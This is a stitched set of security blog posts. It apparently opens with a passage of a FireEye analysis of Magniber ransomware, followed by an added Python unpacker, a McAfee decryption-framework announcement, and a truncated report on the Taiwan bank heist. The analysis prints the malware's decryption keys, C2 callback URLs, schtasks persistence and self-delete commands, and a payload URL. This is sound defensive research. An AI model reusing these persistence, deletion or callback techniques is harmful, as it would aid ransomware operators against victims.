Figure 3: Magnitude EK landing page

As seen previously with Magnitude EK, the payload is downloaded as a plain EXE (see Figure 4) and domain infrastructure is hosted on the following server:

“Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6”


Figure 4: Magnitude payload header and plain MZ response

Payload

In the initial report published by our colleagues at Trend Micro, the ransomware being distributed is referred to as Magniber. These ransomware payloads only seem to target Korean systems, since they won’t execute if the system language is not Korean.

Magniber encrypts user data using AES128. The sample used (dc2a2b84da359881b9df1ec31d03c715) for this analysis was pulled from our DTI system when the campaign was active. Of note, this sample differs from the hash shared publicly by Trend Micro, but the two exhibit the same behavior and share the infection vector, and both were distributed around the same time.

The malware contains a binary payload in its resource section encrypted in reverse using RC4. It starts unpacking it from the end of the buffer to its start. Reverse RC4 decryption keys are 30 bytes long and also contain non-ASCII characters. They are as follows:

  • dc2a2b84da359881b9df1ec31d03c715 RC4 key:
    • { 0x6b, 0xfe, 0xc4, 0x23, 0xac, 0x50, 0xd7, 0x91, 0xac, 0x06, 0xb0, 0xa6, 0x65, 0x89, 0x6a, 0xcc, 0x05, 0xba, 0xd7, 0x83, 0x04, 0x90, 0x2a, 0x93, 0x8d, 0x2d, 0x5c, 0xc7, 0xf7, 0x3f }

The malware calls GetSystemDefaultUILanguage, and if the system language is not Korean, it exits (instructions can be seen in Figure 5). After unpacking in memory, the malware starts executing the unpacked payload.


Figure 5: Language check targeted at Korea

A mutex with name "ihsdj" is created to prevent multiple executions. The payload then generates a pseudorandom 19-character string based on the CPU clock from multiple GetTickCount calls. The string is then used to create a file in the user’s %TEMP% directory (e.g. "xxxxxxxxxxxxxxxxxxx.ihsdj"), which contains the IV (Initialization Vector) for the AES128 encryption and a copy of the malware itself with the name "ihsdj.exe".

Next, the malware constructs 4 URLs for callback. It uses the 19-character long pseudorandom string it generated, and the following domains to create the URLs:

  • bankme.date
  • jobsnot.services
  • carefit.agency
  • hotdisk.world

In order to evade sandbox systems, the malware checks to see if it's running inside a VM and appends the result to the URL callback. It does this by sandwiching and executing CPUID instructions (shown in Figure 6) between RDTSC calls, forcing VMEXIT.


Figure 6: CPUID instruction to detect VM presence

The aforementioned VM check is done multiple times to gather the average execution time of the CPUID, and if the average execution time is greater than 1000, it considers the system to be a VM. In case the test fails and the malware thinks the system is a VM, a "1" is appended at the end of the URL (see Figure 7); otherwise, "0" is appended. The format of the URL is as follows:

  • http://[19 character pseudorandom string].[callback domain]/new[0 or 1]

Examples of this would be:

  • http://7o12813k90oggw10277.bankme[.]date/new1
  • http://4bg8l9095z0287fm1j5.bankme[.]date/new0


Figure 7: Command and control communication

If the malware is executed a second time after encryption, the callback URL ends in "end0" or "end1" instead of "new". An example of this would be:

  • hxxp://j2a3y50mi0a487230v1.bankme[.]date/end1

The malware then starts to encrypt user files on the system, renaming them by adding a ".ihsdj" extension to the end. The AES128 Key and IV for the sample analyzed are listed:

  • IV: EP866p5M93wDS513
  • AES128 Key: S25943n9Gt099y4K

A text file "READ_ME_FOR_DECRYPT_xxxxxxxxxxxxxxxxxxx_.txt" is created in the user’s %TEMP% directory and shown to the user. The ransom message is shown in Figure 8.


Figure 8: Ransom message for the infected user

The malware also adds scheduled tasks to run its copy from %TEMP% with compatibility assistant, and loads the user message as follows:

  • schtasks /create /SC MINUTE /MO 15 /tn ihsdj /TR "pcalua.exe -a %TEMP%\ihsdj.exe
  • schtasks /create /SC MINUTE /MO 15 /tn xxxxxxxxxxxxxxxxxxx /TR %TEMP%\READ_ME_FOR_DECRYPT_xxxxxxxxxxxxxxxxxxx_.txt

The malware then issues a command to delete itself after exiting, using the following local ping to provide delay for the deletion:

  • cmd /c ping localhost -n 3 > nul & del C:\PATH\MALWARE.EXE)

Figure 9 contains the Python code for unpacking the malware payload, which is encrypted using RC4 in reverse.


Figure 9: Python script for unpacking malware payload
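The reverse-RC4 unpacking described above, as an added example that is not the Figure 9 script from the FireEye post: RC4_KEY is the 30-byte key listed earlier for sample dc2a2b84da359881b9df1ec31d03c715, the packed blob is a constructed fake PE stub run through the same routine (RC4 is symmetric), and it is assumed that "from the end of the buffer to its start" means keystream byte 0 is applied to the last byte of the resource while the buffer keeps its order.

```python
"""Unpack a Magniber-style resource that was RC4-encrypted "in reverse".

Added example, not FireEye's code. RC4_KEY is the key listed above for sample
dc2a2b84da359881b9df1ec31d03c715. The packed blob is constructed here, not
taken from the real sample. Assumption: the keystream starts at the last byte.
"""
from typing import Iterator, Optional

RC4_KEY = bytes([
    0x6b, 0xfe, 0xc4, 0x23, 0xac, 0x50, 0xd7, 0x91, 0xac, 0x06,
    0xb0, 0xa6, 0x65, 0x89, 0x6a, 0xcc, 0x05, 0xba, 0xd7, 0x83,
    0x04, 0x90, 0x2a, 0x93, 0x8d, 0x2d, 0x5c, 0xc7, 0xf7, 0x3f,
])


def rc4_keystream(key: bytes) -> Iterator[int]:
    """Standard RC4: key-scheduling over the key, then PRGA bytes forever."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def rc4_reverse(data: bytes, key: bytes) -> bytes:
    """Apply the keystream walking from the last byte to the first.

    out[k] = data[k] ^ ks[len(data) - 1 - k]. Packing and unpacking are the
    same operation because XOR with the keystream is its own inverse.
    """
    ks = rc4_keystream(key)
    out = bytearray(len(data))
    for pos in range(len(data) - 1, -1, -1):
        out[pos] = data[pos] ^ next(ks)
    return bytes(out)


def looks_like_pe(buf: bytes) -> bool:
    """MZ header whose e_lfanew field points at a PE signature."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(buf[0x3C:0x40], "little")
    return buf[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def unpack_resource(blob: bytes, key: bytes = RC4_KEY) -> Optional[bytes]:
    """Decrypt the resource and return it only if it validates as a PE image."""
    payload = rc4_reverse(blob, key)
    return payload if looks_like_pe(payload) else None


def build_fake_pe_stub() -> bytes:
    """Constructed 128-byte stand-in for the real unpacked payload."""
    marker = b"constructed test stub, not real malware"
    buf = bytearray(0x80)
    buf[0:2] = b"MZ"
    buf[0x3C:0x40] = (0x40).to_bytes(4, "little")  # e_lfanew -> 0x40
    buf[0x40:0x44] = b"PE\0\0"
    buf[0x50:0x50 + len(marker)] = marker
    return bytes(buf)


if __name__ == "__main__":
    stub = build_fake_pe_stub()
    packed = rc4_reverse(stub, RC4_KEY)  # what the resource section would hold
    recovered = unpack_resource(packed)
    print("recovered PE stub:", recovered == stub)  # True
```

On a real sample, read the resource bytes into `blob` and call `unpack_resource(blob)`; a `None` result means either the key or the assumed direction does not match that build.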

Conclusion

Ransomware is a significant threat to enterprises. While the current threat landscape suggests a large portion of attacks are coming from emails, exploit kits continue to put users at risk – especially those running old software versions and not using ad blockers. Enterprises need to make sure their network nodes are fully patched.

All FireEye products detect the malware in our MVX engine. Additionally, FireEye NX blocks delivery at the infection point.

IOCs

Malware Sample Hash
  • dc2a2b84da359881b9df1ec31d03c715 (decryption key shared)
Malvertiser Domains
  • fastprofit[.]loan
  • fastprofit[.]me
EK Domain Examples
  • 3e37i982wb90j.fileice[.]services
  • a3co5a8iab2x24g90.helpraw[.]schule
  • 2i1f3aadm8k.putback[.]space
Command and Control Domains
  • 3ee9fuop6ta4d6d60bt.bankme.date
  • 3ee9fuop6ta4d6d60bt.jobsnot.services
  • 3ee9fuop6ta4d6d60bt.carefit.agency
  • 3ee9fuop6ta4d6d60bt.hotdisk.world

Ransomware Decryption Framework – Now Available

This blog details the availability of the McAfee Ransomware Recover (Mr 2).  We would like to credit Kunal Mehta and Charles McFarland in the work required to develop this framework.

How do I get my files back?  This is probably the first question asked when ransomware strikes. Of course, the answer will depend on whether there is a backup available. Or if a decryption tool exists on the www.nomoreransom.org website.

Developing these tools invariably involves significant effort, not only to identify the decryption keys but also to create a tool that can be tested, hosted and then made freely available to help victims of ransomware. Today, however, we are pleased to announce the availability of McAfee Ransomware Recover (Mr 2). This framework will allow for the rapid incorporation of decryption keys and custom decryption logic (when they become available) and get help to victims of ransomware a lot quicker.

Now, whilst the availability of a framework is important, it’s probably not something you would say deserves the fanfare of the communications we have produced. However, the key difference here is that this framework is free to use for the security community. So if security researchers have identified decryption keys and custom decryption logic for a ransomware variant, and do not want to spend the time to produce their own tool, then McAfee Ransomware Recover (Mr 2) is available to freely use.

Over the course of the next few weeks we will produce more guidance on the tool, including webcasts by the development team. Also, we will remain committed to working with our public and private sector partners to get our hands on as many decryption keys as possible.

Follow us on Twitter for all updates from #MPOWER17 at @McAfee.

The post Ransomware Decryption Framework – Now Available appeared first on McAfee Blogs.

Taiwan Bank Heist and the Role of Pseudo Ransomware

Widespread reports claim the Far Eastern International Bank in Taiwan has become a victim of hacking. The attacks demonstrate the global nature of cybercrime, with the cybercriminals attempting to wire US$60 million to destinations such as Sri Lanka, Cambodia, and the United States. Recent reports from Sri Lanka say that two individuals have been arrested for suspected money laundering after a tip-off from the Bank of Ceylon, which reported a suspicious transfer of $1.2 million from the Far Eastern International Bank.

On Saturday October 7, Far Eastern International Bank reported that it had recovered most of the money and that overall losses could reach $500,000.

How did the attack happen?

Based on the initial intelligence we have received, the first direct interaction with the victim began with spear phishing attacks that contained “backdoor” attachments.

Figures 1 and 2 provide some examples of the attachments.

Figure 1: Spear phishing attachment.

Figure 2: Spear phishing attachment.

When the victim clicks on the link, they are redirected to a malicious site that downloads additional files to the victim’s computer. One example of these malicious sites is hxxps://jobsbankbd.com/maliciousfilename.exe.

This site hosts another backdoor that gives the criminals access to the victim’s system in the bank.

Once the criminals gain access to the systems, our initial analysis reveals that the attackers harvested credentials. This was confirmed by evidence we found in a sample that contained the following credentials from the bank:

  • FEIB\SPUSER14
  • FEIB\scomadmin

These credentials are used to create a scheduled task on the system and monitor the running of endpoint security services. (This does not indicate a problem with the security software, only that the attackers did their research and took measures to take out the security software being run within the bank.) We have notified the security provider, and have provided all of our research to date.

Besides the scheduled task and credentials, we discovered another interesting piece of code. I